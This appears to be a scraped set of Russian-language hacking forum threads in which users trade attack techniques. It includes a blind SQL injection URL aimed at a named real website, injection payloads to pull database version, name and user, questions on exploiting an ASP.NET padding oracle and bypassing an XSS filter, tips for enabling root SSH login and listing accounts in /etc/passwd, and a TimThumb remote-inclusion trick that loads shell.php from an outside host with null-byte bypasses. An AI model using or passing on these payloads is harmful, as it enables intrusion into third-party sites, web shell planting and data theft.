Code: http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=rand(if(ascii(substr(version(),1,1))=53,1,0))&dir=asc 5+
вопрос по microsoft acces: нашел полЯ с выводом теперь если можно примером: 1.как узнать юзера,базу и т.д. 2.как повысить привелегии на чтение системных таблиц и для иСПОЛЬЗОВАНИЯ стандартного шелла спецы помогите!
Ты в слове "иСПОЛЬЗОВАНИЯ" кнопкой shift неправильно воспользовался. 1) Для того, что бы проверить, надо что-нибудь вывести, для этого используем подзапрос, и так что же мы можем вывести: 1 or 1=@@version-- - Версия 1 or 1=(select db_name())-- - Имя Базы Данных текущего юзера. 1 or 1=(select system_user)-- - Имя юзера владельца данной базой. https://forum.antichat.ru/thread30501.html 2)Не понятно
По пункту 2 читал оф. Документацию office.microsoft.com/ru-ru/access-help/CH010072899.aspx не понятно как все это дело вставлять в инъекцию
ASP.NET Padding Oracle Vulnerability Здравствуйте, хотелось бы узнать, каким же образом можно использовать данную уязвимость? В общем по переходе на ссылку: выводится сообщение: Все ссылки на самом сайте имеют расширение wbp: Мои познания очень неглубоки, так что буду очень благодарен если кто нибудь сможет мне разжевать данную информацию. Заранее всем большое спасибо...
Здравствуйте, возможно ли обойти фильтр XSS если никакие символы не фильтруются, кроме как если за "<" есть какой то другой символ , тогда фильтр вырезает эту скобку, а если пробел то оставляет. XSS в тэге , не в атрибуте. Спасибо.
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл /etc/ssh/sshd_config PermitRootLogin no -> PermitRootLogin yes
спрятать от кого или от чего? в /etc/passwd все равно палится учетка Code: cat /etc/passwd | awk -F: '{print $1}'
Word press TimThumb Уязвимость /wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
а ты пробовал blabla.php%00.jpg , или через temper data? или так же заместо http://yousite.com/shell.php так https://yousite.com/shell.php,ftp://yousite.com/shell.php?
